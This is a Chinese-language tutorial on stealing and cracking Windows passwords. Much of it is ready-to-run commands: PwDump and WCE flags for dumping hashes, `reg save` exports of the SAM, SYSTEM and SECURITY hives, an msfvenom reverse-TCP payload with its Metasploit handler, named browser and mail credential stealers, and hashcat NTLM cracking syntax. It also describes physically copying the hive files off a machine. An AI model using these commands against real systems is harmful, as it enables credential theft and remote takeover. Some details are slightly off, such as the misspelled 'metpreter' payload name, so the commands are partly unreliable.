Windows密碼獲取和破解
本文只是簡單的講明密碼獲取和破解
具體的操作細節均以模糊或具體代碼混淆等方式避開
如有興趣請自行研究,本文不做細說~~~
獲取思路:
Windows密碼一般是以“哈希值”進行加密保存,我們獲取破解密碼哈希值就可以獲得密碼了~
- 通過0day直接獲得權限;通過工具(WCE)或者漏洞(MS08-067溢出獲得system權限)
- 內網環境下通過嗅探掃描探測,暴力破解獲取系統密碼
- 本地直接獲得密碼(讀取系統system文件下的config所有文件逐一分析)
密碼獲取工具:
gethash、gsecdump、Quarks PwDump、Pwdump、mimikatz、WCE……
Quarks PwDump:
是一款Windows下用戶密碼提取的開源工具,可以抓取Windows平台下多種類型的用戶憑證,包括本地賬戶、域賬戶、緩存的域賬戶和Bitlocker的提取。
Quarks PwDump -dh1 // 導出本地哈希值
Quarks PwDump -dhdc // 導出內存中域賬戶哈希值
Quarks PwDump -dhd // 導出域哈希值(指定NTDS文件)
WCE:
是一款功能強大的Windows平台的內網滲透工具,可以列舉登錄會話,並且可以添加、變更、刪除相關的憑證數據。是內網滲透的必備工具之一
wce -a //獲取所有賬戶哈希值
reg命令:導出密碼文件
通過執行reg
命令將SAM、System、SECURITY等文件內容導出到文件中
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
命令執行后將會將文件保存在本地~
PowerShell獲取:
PowerShell加載mimikatz模塊獲取密碼,通過執行該ps腳本即可獲取Windows密碼
MSF反彈hashdump及mimikatz獲取:
通過MSF生成反彈shell或直接溢出獲取反彈shell,在MSF下執行hashdump
即可~
-
生成反彈木馬:
> msfvenom -p windows/metpreter/reverse_tcp LHOST=192.168.2.196 LPORT=443 -f exe -o met.exe
-
MSF使用反彈處理模塊
> use exploit/multi/handler > set PAYLOAD windows/meterpreter/reverse_tcp > set LHOST 192.168.2.0 > set LPORT 443 > exploit
-
提權操作……
其它小工具
下列小工具在Windows平台運行就會獲得相關的用戶憑證……
mailpv:獲取mail密碼
mspass:獲取MSN密碼
pst_password:獲取Outlook密碼
IE PV:獲取IE瀏覽器緩存密碼
各類瀏覽器密碼獲取工具
passwordfox:獲取Firefox瀏覽器憑證
chromepass:獲取谷歌瀏覽器憑證
無線網絡密碼獲取工具
遠程桌面密碼獲取:
rdpv —— cmdkey/list
—— netpass.exe
破解密碼哈希值
在線破解:
- CMD5官網
- ophcrack在線破解
ophcrack破解:
導入哈希值,加載Tables,執行Crack~
hashcat破解:
最流行的、最快的密碼破解工具
破解:
將准備好的字典password.lst和需要破解的哈希值文件win.hast,復制到hashcat32程序文件夾下,執行命令破解:
hashcat -m 1000 -a 0 -o winpassok.txt win.hash password.lst --username
-m 1000
表示破解密碼類型為NTLM
-a 0
表示采用字典破解
-o [feilname].txt
表示將破解后的文件輸出到指定的文件中
--remove win.hash
表示從win.hash移除破解成功的hash,密碼中有username不能與remove參數同時使用,也可以單一破解
password.lst
密碼字典文件
物理獲取密碼
獲取SAM和SYSTEM文件
文件通常在C:\Windows\System32\config
目錄下存放(通常會使用系統盤PE系統進入並拿走文件),找到文件並拷貝:SAM
SYSTEM
SECURITY
三個文件
導入文件
使用SAMInside
軟件將三個文件導入到軟件中,之后軟件就會告知Hash值~
破解哈希密碼
導出需要破解的哈希密碼值,賦值拷貝到ophcrack
軟件中進行破解